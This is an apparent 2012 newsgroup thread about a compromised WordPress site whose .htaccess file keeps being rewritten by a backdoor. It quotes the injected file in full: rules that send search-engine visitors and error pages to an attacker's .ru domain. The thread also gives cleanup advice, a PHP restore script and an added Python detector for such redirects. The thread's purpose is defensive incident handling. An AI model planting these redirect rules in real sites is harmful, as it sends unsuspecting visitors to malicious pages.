Subject: Re: Website break-in - .htaccess file keeps being changed
Author: FX
Date: 2012-02-07 10:26:54
But what a jerk, pardon my language :D if someone managed to overwrite the
.htaccess file and even play with its permissions, then they can also pull
the database credentials out of the wp-config.php file :DDD

FX

"useris"  wrote in message news:jgpmac$e1m$1@trimpas.omnitel.net...

That's what I did, except that the backdoor would change the permissions
however it needed; there was a separate .php file, _cache.php, and renaming
it fixed the problem.
I changed the passwords, except for MySQL, because that one can't be changed
due to the quirks of the Hostex Plesk panel.


"FX" <somebody@apple.com> wrote in message
news:jgo7nb$7n3$1@trimpas.omnitel.net...
> I've had this pleasure too :D
>
> 1. change the FTP and other passwords
> 2. replace it with your own htaccess file and set the permissions to, I think, 444
> 3. check whether any of the php files is suspiciously large, and look
> whether the suspiciously large one contains code obfuscated with base64
>
> P.S. do it quickly, because Google will put you on the malware lists :)
>
> FX
>
> "useris"  wrote in message news:jgkg9j$jf6$1@trimpas.omnitel.net...
>
> Contents of the modified .htaccess file:
>
>
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
> RewriteRule ^(.*)$ http://xisicongatarc.ru/emain/index.php [R=301,L]
> RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
> RewriteRule ^(.*)$ http://xisicongatarc.ru/emain/index.php [R=301,L]
> </IfModule>
>
>
> # BEGIN WordPress
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteBase /
> RewriteRule ^index\.php$ - [L]
> RewriteCond %{REQUEST_FILENAME} !-f
> RewriteCond %{REQUEST_FILENAME} !-d
> RewriteRule . /index.php [L]
> </IfModule>
> # END WordPress
>
>
>
> ErrorDocument 400 http://xisicongatarc.ru/emain/index.php
> ErrorDocument 401 http://xisicongatarc.ru/emain/index.php
> ErrorDocument 403 http://xisicongatarc.ru/emain/index.php
> ErrorDocument 404 http://xisicongatarc.ru/emain/index.php
> ErrorDocument 500 http://xisicongatarc.ru/emain/index.php
>
> For now I wrote a small PHP script so that I don't have to keep deleting
> the code by hand, but I have to keep running it for it to work
>
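> <?php
>
> // Restores .htaccess (in the script's working directory) to the stock
> // WordPress rules, discarding whatever was injected into it.
> $myFile = ".htaccess";
>
> // chmod() only succeeds for the file's owner, so owner-write (0644) is
> // enough to reopen the file; 0777 would leave it writable by everyone.
> chmod($myFile, 0644);  // octal; correct value of mode
>
> // 'w' truncates the file, so the injected rules are dropped.
> $fh = fopen($myFile, 'w') or die("can't open file");
>
> $stringData = "
> # BEGIN WordPress
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteBase /
> RewriteRule ^index\.php$ - [L]
> RewriteCond %{REQUEST_FILENAME} !-f
> RewriteCond %{REQUEST_FILENAME} !-d
> RewriteRule . /index.php [L]
> </IfModule>
> # END WordPress";
>
> fwrite($fh, $stringData);
>
> fclose($fh);
>
> ?>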
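
The modified .htaccess quoted in this thread has two recognisable traits: a RewriteCond on HTTP_REFERER feeding a RewriteRule that points off-site, and ErrorDocument lines that point off-site. The Python checker below is an added example and not part of any post in the thread; `scan_htaccess`, `external_host`, the sample text and the `redirect.example` / `myblog.example` hosts are constructed for illustration.

```python
from urllib.parse import urlparse

# Constructed sample modelled on the quoted file: lists shortened, redirect host is a placeholder.
SAMPLE = r"""
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing)\.(.*)
RewriteRule ^(.*)$ http://redirect.example/emain/index.php [R=301,L]
</IfModule>
# BEGIN WordPress
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
ErrorDocument 404 http://redirect.example/emain/index.php
"""

def external_host(target, own_hosts):
    """Return the host of an absolute URL that is not one of ours, else None."""
    target = target.strip('"')
    host = urlparse(target).hostname if "://" in target else None
    return host if host and host.lower() not in own_hosts else None

def scan_htaccess(text, own_hosts=()):
    """Return (line_no, reason, host) for off-site redirects and error pages."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()  # leading padding is ignored
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond":  # conditions apply to the next RewriteRule
            referer_cond |= "HTTP_REFERER" in raw.upper()
        elif directive == "rewriterule":
            host = external_host(parts[2], own) if len(parts) > 2 else None
            if host:
                reason = "referer-gated redirect" if referer_cond else "external redirect"
                findings.append((no, reason, host))
            referer_cond = False
        elif directive == "errordocument" and len(parts) > 2:
            host = external_host(parts[2], own)
            if host:
                findings.append((no, "external ErrorDocument", host))
    return findings

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, own_hosts={"myblog.example"}):
        print(finding)
```

Passing the site's own host names in `own_hosts` keeps legitimate absolute redirects (for example a forced canonical host) out of the findings.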